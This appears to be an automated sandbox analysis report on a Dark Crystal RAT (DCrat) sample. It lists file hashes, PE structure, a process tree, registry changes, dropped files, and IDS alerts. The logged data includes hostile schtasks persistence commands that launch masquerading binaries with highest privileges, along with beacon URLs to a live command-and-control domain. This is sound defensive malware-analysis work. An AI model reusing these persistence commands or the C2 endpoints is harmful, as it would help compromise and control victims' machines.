File name: | b3fe05feed5ce43ecc5968a72467aff2.exe |
Full analysis: | https://app.any.run/tasks/d31275b5-51dd-4645-a69f-04bb3a6449a9 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | April 01, 2023, 04:31:15 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
MD5: | B3FE05FEED5CE43ECC5968A72467AFF2 |
SHA1: | B1C47D779B4F6B579E28B47C64F1BADC8E0ACC5A |
SHA256: | 050F5866D9BCA42881CF88386BF408E30CA584B1B19030FA94B131E722DD4792 |
SSDEEP: | 24576:h2G/nvxW3WfkUJaFRxxLyRH7jR170gt1HL:hbA31UMFvx2hJ |
Extension | Identification |
---|---|
.exe | Win32 Executable (generic) (52.9) |
.exe | Generic Win/DOS Executable (23.5) |
.exe | DOS Executable Generic (23.5) |
Field | Value |
---|---|
Subsystem: | Windows GUI |
SubsystemVersion: | 5.1 |
ImageVersion: | - |
OSVersion: | 5.1 |
EntryPoint: | 0x1ec40 |
UninitializedDataSize: | - |
InitializedDataSize: | 77824 |
CodeSize: | 201216 |
LinkerVersion: | 14 |
PEType: | PE32 |
ImageFileCharacteristics: | Executable, 32-bit |
TimeStamp: | 2020:12:01 18:00:55+00:00 |
MachineType: | Intel 386 or later, and compatibles |
Field | Value |
---|---|
Architecture: | IMAGE_FILE_MACHINE_I386 |
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 01-Dec-2020 18:00:55 |
Detected languages: | |
Debug artifacts: | |
DOS header field | Value |
---|---|
Magic number: | MZ |
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000118 |
PE file header field | Value |
---|---|
Signature: | PE |
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 6 |
Time date stamp: | 01-Dec-2020 18:00:55 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: | |
Name | Virtual Address | Virtual Size | Raw Size | Characteristics | Entropy |
---|---|---|---|---|---|
.text | 0x00001000 | 0x000310EA | 0x00031200 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.70808 |
.rdata | 0x00033000 | 0x0000A612 | 0x0000A800 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.22174 |
.data | 0x0003E000 | 0x00023728 | 0x00001000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.70882 |
.didat | 0x00062000 | 0x00000188 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.29825 |
.rsrc | 0x00063000 | 0x000051E8 | 0x00005200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 6.3888 |
.reloc | 0x00069000 | 0x00002268 | 0x00002400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 6.55486 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.26192 | 1875 | Latin 1 / Western European | English - United States | RT_MANIFEST |
7 | 3.1586 | 482 | Latin 1 / Western European | English - United States | RT_STRING |
8 | 3.11685 | 460 | Latin 1 / Western European | English - United States | RT_STRING |
9 | 3.11236 | 440 | Latin 1 / Western European | English - United States | RT_STRING |
10 | 2.99727 | 326 | Latin 1 / Western European | English - United States | RT_STRING |
11 | 3.2036 | 1094 | Latin 1 / Western European | English - United States | RT_STRING |
12 | 3.12889 | 358 | Latin 1 / Western European | English - United States | RT_STRING |
13 | 3.01704 | 338 | Latin 1 / Western European | English - United States | RT_STRING |
14 | 2.94627 | 266 | Latin 1 / Western European | English - United States | RT_STRING |
15 | 2.83619 | 188 | Latin 1 / Western European | English - United States | RT_STRING |
Imported library |
---|
KERNEL32.dll |
USER32.dll (delay-loaded) |
gdiplus.dll |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
1464 | "C:\Users\admin\AppData\Local\Temp\b3fe05feed5ce43ecc5968a72467aff2.exe" | C:\Users\admin\AppData\Local\Temp\b3fe05feed5ce43ecc5968a72467aff2.exe | — | explorer.exe | User: admin; Integrity Level: MEDIUM; Exit code: 3221226540 |
2032 | "C:\Users\admin\AppData\Local\Temp\b3fe05feed5ce43ecc5968a72467aff2.exe" | C:\Users\admin\AppData\Local\Temp\b3fe05feed5ce43ecc5968a72467aff2.exe | | explorer.exe | User: admin; Integrity Level: HIGH; Exit code: 0 |
1896 | "C:\Windows\System32\WScript.exe" "C:\blockagentWincrt\Ct0r69Us2cLOmGEvM4uxv1.vbe" | C:\Windows\SysWOW64\wscript.exe | — | b3fe05feed5ce43ecc5968a72467aff2.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
1660 | C:\Windows\system32\cmd.exe /c ""C:\blockagentWincrt\OnRVU.bat" " | C:\Windows\SysWOW64\cmd.exe | — | wscript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
340 | "C:\blockagentWincrt\hostDhcpsvc.exe" | C:\blockagentWincrt\hostDhcpsvc.exe | | cmd.exe | User: admin; Integrity Level: HIGH; Exit code: 0; Version: 1.1.1o |
504 | schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Windows\IME\IMESC5\DICTS\smss.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
1896 | schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\IME\IMESC5\DICTS\smss.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
840 | schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Windows\IME\IMESC5\DICTS\smss.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
1504 | schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Windows\Logs\CBS\cmd.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
1036 | schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\Logs\CBS\cmd.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Key | Name | Operation | Value |
---|---|---|---|---|---|
2032 | b3fe05feed5ce43ecc5968a72467aff2.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | write | 1 |
2032 | b3fe05feed5ce43ecc5968a72467aff2.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | write | 1 |
2032 | b3fe05feed5ce43ecc5968a72467aff2.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | write | 1 |
2032 | b3fe05feed5ce43ecc5968a72467aff2.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | write | 0 |
1896 | wscript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | write | 1 |
1896 | wscript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | write | 1 |
1896 | wscript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | write | 1 |
1896 | wscript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | write | 0 |
340 | hostDhcpsvc.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | write | 1 |
340 | hostDhcpsvc.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | write | 1 |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2032 | b3fe05feed5ce43ecc5968a72467aff2.exe | C:\blockagentWincrt\OnRVU.bat | text | A8D7E9F3DB5423AB33C4C97252E92DE6 | BAB57932EB46F7496D17D548A0F41331D2B1EA9E01CD59A54E5A07684507F6E4 |
340 | hostDhcpsvc.exe | C:\Windows\IME\IMESC5\DICTS\69ddcba757bf72 | text | 2A5C89319378DCC9A0C92361CEF8CEAD | 1E7494AE47811F75A044A6C8E7DED01541978B0A9390E2A069C06B944B28DA3C |
2032 | b3fe05feed5ce43ecc5968a72467aff2.exe | C:\blockagentWincrt\Ct0r69Us2cLOmGEvM4uxv1.vbe | vbe | 81DA2831BF2FEB8ACE4E74C87D1A8604 | 2A14D99C768A25A7DB8959C449BFE7AC039B4AF7CA6DDBF62E89A92F6C482676 |
340 | hostDhcpsvc.exe | C:\Windows\Logs\CBS\ebf1f9fa8afd6d | text | 105A6089512FD7FFD5D304614F9EA01F | D6F24271E2ECA62B5F175601271FBC356C3F7B4CCB26A46241EA1C9605A8F957 |
340 | hostDhcpsvc.exe | C:\found.000\7a0fd90576e088 | text | 601AC9AE1296A7BDBB7B6071253ED84D | F2715ACF480B4D31663A5E927991A58AF17A97A004A96573F0865D955A1A9D6F |
340 | hostDhcpsvc.exe | C:\Recovery\de82876a-02a9-11e8-aa76-af8e13208fdf\f3b6ecef712a24 | text | 179EF856AD597B827333F661A4166FEE | C135C265AD763423C1848B8DC0D05DB374200AF0FAF9E575A995D88C5EA222A9 |
340 | hostDhcpsvc.exe | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\PTB\101b941d020240 | text | 12867B8361CC58D8037C060D19B15E0A | 9A7CA44AD66B689F0011A9E0E64DC72E95245C5EEC24617C3B147866D9A8FE2C |
340 | hostDhcpsvc.exe | C:\found.000\explorer.exe | executable | 82FA25A9FBEFD9602DD338788512903E | 2965473ECC25AA7BB84CB7A86A5436D82002AAA6964049D5ADDDFD6CDD96F6CC |
340 | hostDhcpsvc.exe | C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\explorer.exe | executable | 82FA25A9FBEFD9602DD338788512903E | 2965473ECC25AA7BB84CB7A86A5436D82002AAA6964049D5ADDDFD6CDD96F6CC |
340 | hostDhcpsvc.exe | C:\Users\admin\AppData\Local\Temp\sPGQ3IzL2i | text | 9881633857A2797D79FE5B921FE65617 | 97B5B4CDCEC0EE6ECE92DEE3393034E325A35842D545E58774808AB34116C6B3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2292 | spoolsv.exe | GET | 200 | 94.142.138.11:80 | http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&32e531e655eaad7c57fc0081c6a6bfd1=… | RU | text | 2.13 Kb | malicious |
2292 | spoolsv.exe | GET | 200 | 94.142.138.11:80 | http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&18fb8b8940d0c16b5368d63ec574ee70=d1nI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W&a8a48074824fd3590e8bb0226bd0afb5=… | RU | text | 104 b | malicious |
2292 | spoolsv.exe | GET | 200 | 94.142.138.11:80 | http://686084.clmonth.nyashteam.top/Jsprivate.php?OfETBOKf9l6aw1xEuS2QxSLbsF=t2wvZOdU8aJPVkn89JBL&HcyltfA5Unl6=bmNzgMShyolChpKULSq4&lZ7KpscZo=hSsJBvKmz2yTyMiM00kIU5CXzN&ca16cbf4abd5e18c7238ba2d26e37d1b=b38619f9986806ad85e919fe27d3506a&c046c2ee8690509603eb62347da0996c=wYmZDMxYTZ3UDO4IDMiNWY0YTYkJjY0AzM2kjMlFTN2MTNlZmMjZWY&OfETBOKf9l6aw1xEuS2QxSLbsF=t2wvZOdU8aJPVkn89JBL&HcyltfA5Unl6=bmNzgMShyolChpKULSq4&lZ7KpscZo=hSsJBvKmz2yTyMiM00kIU5CXzN | RU | text | 2.13 Kb | malicious |
2292 | spoolsv.exe | GET | 200 | 94.142.138.11:80 | http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&a8a48074824fd3590e8bb0226bd0afb5=0VfiIiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI5ETNhNGZjBzY0E2Y2QWYwIWM0EDZ0EDM2MWY0MWZwEGNjZTYlNGZjJiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W | RU | text | 2.13 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2292 | spoolsv.exe | 94.142.138.11:80 | 686084.clmonth.nyashteam.top | Network Management Ltd | RU | malicious |
— | — | 94.142.138.11:80 | 686084.clmonth.nyashteam.top | Network Management Ltd | RU | malicious |
Domain | IP | Reputation |
---|---|---|
686084.clmonth.nyashteam.top | | malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
2292 | spoolsv.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
2292 | spoolsv.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
2292 | spoolsv.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
2292 | spoolsv.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
2292 | spoolsv.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |